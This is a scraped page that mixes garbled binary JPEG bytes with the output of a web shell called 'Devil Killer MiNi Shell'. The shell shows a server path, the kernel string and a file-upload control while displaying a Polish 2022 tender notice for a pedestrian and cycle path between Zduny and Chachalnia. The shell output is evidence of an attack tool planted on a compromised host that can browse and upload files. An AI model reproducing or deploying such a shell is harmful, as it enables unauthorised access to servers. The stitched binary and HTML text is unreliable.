JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220404/0010803401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ścieżki pieszo - rowerowej droga powiatowa 5165P Zduny -Chachalnia od km 0+200 do km 2+535 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W KROTOSZYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250864824</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Transportowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krotoszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627226531</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pzdkrotoszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pzdkrotoszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ścieżki pieszo - rowerowej droga powiatowa 5165P Zduny -Chachalnia od km 0+200 do km 2+535 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-35a59e0d-b3ed-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00108034</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020568/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa ścieżki pieszo - rowerowej droga powiatowa 5165P Zduny- Chachalnia od km 0+200 do km 2+535</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pzd_krotoszyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pzd_krotoszyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w formie elektronicznej w języku polskim przy użyciu środków<br/>komunikacji elektronicznej, tj. przy użyciu Platformy Zakupowej (zwanej dalej „Platforma”) pod<br/>adresem: https://platformazakupowa.pl/pn/pzd_krotoszyn<br/>2. Za pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego” odbywa się<br/>komunikacja wykonawcy z zamawiającym w postępowaniu, w szczególności: przekazywanie<br/>dokumentów, oświadczeń, informacji, pytań, odpowiedzi na pytania, modyfikacji, przekazywanie<br/>wezwań i zawiadomień w ramach prowadzonego postępowania.<br/>3. Środkiem komunikacji elektronicznej służącym złożeniu oferty przez Wykonawcę, jest jego<br/>prawidłowe złożenie na Platformie, w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z<br/>niniejszym postępowaniem. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>4. Za datę przekazania (wpływu)oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem Platformy poprzez funkcję „Wyślij wiadomość do<br/>zamawiającego”, po której pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres<br/>poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: biuro@pzdkrotoszyn.pl<br/>5. Zamawiający będzie zamieszczał na Platformie w sekcji „Komunikaty” wszelką korespondencję,<br/>której zgodnie z obowiązującymi przepisami, adresatem jest konkretny wykonawca.<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek na bieżąco monitorować wszelką<br/>korespondencję umieszczaną przez zamawiającego w zakładce „komunikaty” i bezpośrednio na<br/>Platformie. System powiadomień może ulec awarii lub powiadomienie może trafić co folderu SPAM.<br/>7. Zamawiający, zgodnie Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min 2 GB RAM, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych-MS Windows 7 ,MAC Os x 10 4, Linux<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>d) włączona obsługa JavaScript.,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej-kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>8. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego”<br/>a) Akceptuje warunki korzystania z platforma zakupowa.pl określone w Regulaminie zamieszczonym<br/>na stronie internetowej pod linkiem w zakładce ”Regulamin” oraz uznaje go wiążący ,<br/>b) Zapoznał się do Instrukcji składania ofert/wniosków dostępne linkiem<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view/.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/pzd_krotoszyn</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Realizując obowiązki, o których mowa w art. 13,<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 2016.119 z 04.05.2016), dalej „RODO”, informuję, że:<br/>1. Administratorem Państwa danych osobowych jest:<br/>Powiatowy Zarząd Dróg w Krotoszynie ulica Transportowa 1, 63-700 Krotoszyn, tel. 62 722 65 31,<br/>e:mail: biuro@pzdkrotoszyn.pl ; www.pzdkrotoszyn.pl,<br/>2..Inspektorem ochrony danych osobowych w Powiatowym Zarządzie Dróg w Krotoszynie jest Pan<br/>Łukasz<br/>Rabenda, e-mail: iod@bhp.krotoszyn.net.pl, tel. 62 722 65 31, z którą można kontaktować się we<br/>wszystkich<br/>sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z<br/>przetwarzaniem danych osobowych.<br/>3.Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z<br/>postępowaniem o udzielenie zamówienia publicznego z przetwarzaniem danych niezbędnych do<br/>wykonania<br/>umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań na żądanie osoby, której<br/>dane<br/>dotyczą, przed zawarciem umowy w postępowaniu pn.: Modernizacja – Przebudowa drogi Kobylin –<br/>Górka– Zalesie Małe na długości 3182mb prowadzonym w trybie podstawowym bez negocjacji;<br/>4.Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 Ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz. U. z 2021r. poz.1129) ,dalej „ustawą Pzp”;<br/>5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78 ust. 1 ustawy Pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących, jest<br/>wymogiem określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego;<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>8. Posiadają Pani/Pana:<br/>a) Na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art.16 RODO prawo do sprostowania Państwa danych osobowych**<br/>c) podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Pani/Pana:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b/c RODO.<br/>10.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych w Warszawie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa ścieżki pieszo-rowerowej zakłada się roboty na całym odcinku przez m. Zduny do wylotu drogi z miejscowości <br/> w km 0+200 / las/ - ścieżka z kostki betonowej gr. 8 cm i dalej do m. Chachania km 3+160<br/> ścieżka o nawierzchni bitumicznej..<br/>Głównie po stronie lewej jezdni projektuje się / pod ścieżką pieszo-rowerową lub wzdłuż / <br/>następujące urządzenia odprowadzające wody opadowe :<br/>a.	kolektor odprowadzający wody deszczowe z jezdni z układem studni kontrolnych i wpustowych. <br/>b.	drenaż francuski<br/>c.	ściek z elementów betonowych 500x280x85 mm posadowiony na podsypce cementowo-piaskowej i ławie betonowej z oporem zlokalizowany przy krawędzi ścieżki<br/>d. odprowadzenie wody studnią wpustową z połączeniem przykanalikiem z rowem <br/> leżącym po drugiej stronie jezdni<br/>W pasie drogi znajdują się następujące przepusty rurowe :<br/> - w km 0+ 952 przepust rurowy ø 60 cm o l= 13,0 mb ,<br/> - w km 2+952 przepust rurowy ø 50 cm o l = 10 mb<br/> Projektuje się następujące przepusty drogowe rurowe , żelbetowe : <br/>- w km 1 +915 - budowa przepustu ø 800 i l = 11 mb, z rur żelbetowych z prawostronną ścianką czołową , strona lewa budowa studni o śred. ø 150 cm <br/> jako elementu połączeniowego kanalizacji deszczowej ,<br/> - w km 2 +272 - budowa przepustu ø 800 i l = 10 mb , z rur żelbetowych z prawostronną ścianką czołową , strona lewa budowa studni o śred. ø 150 cm jako elementu połączeniowego kanalizacji deszczowej <br/>Realizacja ciągu pieszo-rowerowego w km 0+200 do 3+160 o szerokości 2,50 m po stronie lewej jezdni , nawierzchnia chodnika oddzielona od jezdni pasem zieleni ca 1.0-1.5 m, na odcinku drogi powiatowej za wyjątkiem odc. z przewężeniami pasa drogowego, ma na celu podniesienie parametrów technicznych tego odcinka oraz przeniesienie ruchu rowerowego i pieszego z jezdni w bezpieczne miejsce poza jezdnię .<br/>Przedmiar robót przewiduje do wykonania następujące roboty :<br/>- zdjęcie humusu oraz uzupełnienie gruntu kat. II<br/>- wykonanie odwodnienia jezdni , poprzez ułożenie kanalizacji deszczowej z układem studni<br/> kontrolnych i wpustowych<br/>- wykonanie przepustów drogowych wraz z ściankami czołowymi i obrukowaniem wylotów<br/>- wykonanie obramowana pasa ścieżki : krawężnikiem 100x30x15 cm posadowionym a ławie bet. z oporem od strony jezdni oraz bezpośrednio pasa ścieżki obustronnie<br/>obrzeżem betonowym 30x8 cm posadowionym na ławie bet. z oporem od strony pól rolniczych i lasu..<br/> - ułożenie krawężnika drogowego ulicznego - odcinkami.<br/> - wykonanie zatoki autobusowej o nawierzchni z kostki betonowej<br/>- przestrzeń pomiędzy krawędzią jezdni istniejącej ,a krawężnikiem należy <br/> wypełnić betonem <br/>- wykonanie nowej nawierzchni ciągu pieszo-rowerowego o szer. 2,50 m z obustronną <br/> skrajnią po min. 0,20 cm i wys. min .2,50 m <br/> a. w km 0+200 do 2+535 należy wykonać nawierzchnię bitumiczną <br/> ścieżki pieszo-rowerowej o następującej konstrukcji :<br/> - w-wa ścieralna z mieszanki mineralno –asfaltowej gr. 4 cm – AC 11S, 50/70<br/> - w-wa wiążąca z mieszaki mineralno-asfaltowej gr. 4cm – AC 16W 50/70<br/> - podbudowa o gr.15 cm z kruszywa łamanego 0- 31,5 mm stabilizowanego<br/> mechanicznie <br/> - w-wie osączająca gr. 10 cm z piasku <br/>- proj. się wykonanie nowej nawierzchni wjazdów do posesji z kostki betonowej gr. 8 cm <br/> wraz z konstrukcją podbudowy gr. 20 cm z kamienia łamanego oraz w-wy odsączającej<br/> gr 10 cm z piasku w oporniku betonowym 100x25x12 cm na szerokości przejazdu od<br/> strony posesji<br/> - projektuje się odcinki kanalizacji deszczowej - przykanaliki <br/> o średnicy ø 200 mm wraz z układem studni wpustowych krawężnikowo-jezdnych z odprowadzeniem wód do rowu<br/>- proj. się wymianę istniejących odc kanalizacyjnych pod zjazdami poprzez wykonanie<br/> w osi rowu odcinków kanalizacji deszczowej o średnicy rury ø 500 mm i ø 200 mm<br/>- projektuje się zatoki autobusowe w km1 +454 – strona lewa jezdni / półzatoka o szer. 2,0 m z powodu zawężenia pasa drogi w rejonie ulic Brzozowa i Sosnowa ,<br/> - nawierzchnia zatok autobusowych : z kostki betonowej gr. 8 cm.<br/> - uzupełnienie poboczy<br/>- zakłada się odmulenie rowu z nadaniem skarp oraz uzupełnienie pasów zielonych<br/> humusem z obsianiem<br/>Spadek poprzeczny chodnika - 2 % w stronę jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">do 20% wartości zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Oferty nie podlegające odrzuceniu zostaną poddane ocenie ofert w<br/>oparciu o kryteria podane<br/>w ogłoszeniu o niniejszym zamówieniu.<br/>2.Zamawiający dokona oceny ofert na podstawie wyniku osiągniętej liczby punktów przyznanych przez<br/>komisję<br/>przetargową, w oparciu o kryteria oceny ofert i ustaloną punktację. Maksymalną ilość punktów jaką<br/>może<br/>otrzymać oferta wynosi 100 pkt. (100% = 100 pkt). Zamawiający dokona oceny ofert na podstawie<br/>następujących kryteriów oceny ofert:<br/>(A) - Cena ofertowa brutto, waga kryterium 60 %<br/>(B) - Gwarancja jakości na roboty budowlane, waga kryterium 40 %<br/>Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>(A) Kryterium - cena ofertowa brutto:<br/>Oferta z najniższą ceną ofertową brutto otrzyma maksymalną ilość punktów, tj.: 60.<br/>Punkty pozostałych ofert liczone będą wg proporcji matematycznej z dokładnością do dwóch miejsc po przecinku według poniższego wzoru:<br/>C min<br/>P = -------------------------x 60pkt.<br/>C ob<br/>gdzie:<br/>P – ilość punktów za kryterium ceny<br/>Cmin – najniższa cena ofertowa brutto<br/>Cob – cena brutto oferty badanej<br/>(B) Kryterium - gwarancja jakości na roboty budowlane:<br/>Punkty w kryterium zostaną przyznane w oparciu o zapisy poniższej tabeli:<br/>Okres udzielonej gwarancji jakości w miesiącach<br/>Liczba przyznanych punktów (G)<br/>48 miesięcy – okres minimalny 20 pkt<br/>60 miesięcy 40 pkt<br/>Jeżeli Wykonawca poda w formularzu oferty okres gwarancji w latach, Zamawiający przeliczy go na<br/>miesiące wg zasady 1 rok = 12 miesięcy.<br/>Jeżeli Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie<br/>do oceny minimalny (wymagany) 48 - miesięczny okres gwarancji i przyzna 20 pkt, a w przypadku<br/>wyboru oferty Wykonawcy, okres ten zostanie uwzględniony w umowie. W przypadku gdy Wykonawca<br/>zaoferuje okres gwarancji powyżej wymaganego maksimum, Zamawiający do oceny ofert przyjmie 60<br/>miesięcy i przyzna 40 pkt., natomiast do umowy zostanie wpisany okres gwarancji zaproponowany<br/>przez Wykonawcę.<br/>UWAGA: Zaoferowanie gwarancji poniżej wymaganego minimum spowoduje odrzucenie oferty.<br/>3. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ<br/>wymagania oraz uzyska największą liczbę punktów (P) stanowiących sumę punktów przyznanych w<br/>ramach każdego z podanych kryteriów, wyliczony zgodnie z poniższym wzorem:<br/>P = C + G<br/>gdzie :<br/>C – liczba punktów przyznana w ofercie ocenianej w kryterium „Cena oferty brutto”<br/>G – liczba punktów przyznana w ofercie ocenianej w kryterium „gwarancja jakości na roboty budowlane”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) 